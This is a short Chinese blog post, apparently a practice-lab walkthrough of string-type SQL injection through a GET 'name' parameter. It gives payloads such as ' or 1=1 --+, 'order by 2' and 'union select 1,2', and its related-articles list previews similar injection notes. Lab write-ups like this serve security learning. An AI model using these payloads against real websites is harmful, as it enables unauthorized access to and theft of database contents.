首页 > 其他分享 >字符型注入(get)

字符型注入(get)

时间:2023-05-06 11:12:50浏览次数:31  
标签:字符 name get submit 查询 --+ --+& 注入

截图.png

在查询栏输入1,点击查询获得查询格式

?name=1'&submit=查询

截图.png

*捷径 ' or 1=1 --+

截图.png

*非捷径

?name=1' and 1=2 --+ 2--+&submit=查询

用不了,直接查

?name=1' order by 2--+&submit=查询

?name=1' union select 1,2 --+&submit=查询

标签:字符,name,get,submit,查询,--+,--+&,注入
From: https://www.cnblogs.com/xty123456/p/17376650.html

相关文章

  • 数字型注入(post)
    抓包搞到格式id=1&submit=%E6%9F%A5%E8%AF%A2查字符段id=1orderby2&submit=%E6%9F%A5%E8%AF%A2id=1unionselect1,2&submit=%E6%9F%A5%E8%AF%A2......
  • Java中对比两个字符串的相似度
    Java中对比两个字符串的相似度的方法,以下整理了两个方式比对方法,同样的字符串不同的计算方式得到的结果也是不同的:packagetest;/***对比俩个字符串的相似度*@authorsanshi*/publicclassStrUtil{/***获取最长子串(参数顺序与字符串长短无关)......
  • 希腊字符读音参考
    序号大写小写英文注音国际音标注音中文读音意义1Ααalphaa:lf阿尔法角度;系数2Ββbetabet贝塔磁通系数;角度;系数3Γγgammaˈɡæmə伽马电导系数(小写)4Δδdeltadelt德尔塔变动;密度;屈光度5Εεepsilonep`silon伊普西龙对......
  • GetTextAsync 或 异步函数执行完毕后的处理技巧
    //方法一Task.Factory.StartNew(()=>                       {                           //inti=0;                           //varpageText=wb.GetTextAsync();         ......
  • 常用的截取字符串方法JS和Golang实现
    JS中截取字符串很简单,直接使用substr函数substr()方法可在字符串中截取从开始下标开始的指定数目的字符。下标是从0开始算例如:"21".substr(0,1)  返回2golang实现的substr//截取字符串,支持多字节字符//start:起始下标,负数从从尾部开始,最后一个为-1//length:截取长度,......
  • SQL注入UNION攻击
    1.SQL注入UNION攻击当应用程序容易受到SQL注入的攻击并且查询结果在应用程序的响应中返回时,该UNION关键字可用于从数据库中的其他表中检索数据。这会导致SQL注入UNION攻击。关键字UNION SELECT允许您执行一个或多个其他查询,并将结果追加到原始查询。例如:SELECTa,bFR......
  • SQL注入
    一、定义SQL注入(SQLi)是一个Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或......
  • 提取最新的各国疫情数据中json字符串
    1.正则表达式提取json字符串:   -----------------------------------------------------------------初始数据-----------------------------------------------------------------try{window.fetchIndexMallList={"success":true,"errorCode":0,"result......
  • yaml配置注入
    配置文件SpringBoot使用一个全局的配置文件,配置文件名称是固定的application.properties语法结构:key=valueapplication.yml语法结构:key:空格value配置文件的作用:修改SpringBoot自动配置的默认值,因为SpringBoot在底层都给我们自动配置好了yaml注入配置文件yaml可......
  • 虹科干货 | 零售业数智升级不掉队,get数据,get未来!
    电商崛起,传统零售行业危机四伏,全渠道盈利与可持续化成为难点,库存管理这块难啃的“硬骨头”也同样让零售商倍感压力......背腹受敌的零售商,如何才能在数字化转型道路上避免利润缩水,与供应商协作共赢,摆脱困扰,实现逆袭? 一.虹科Domo打造极致数字体验!电商的迅猛发展对传统零售行......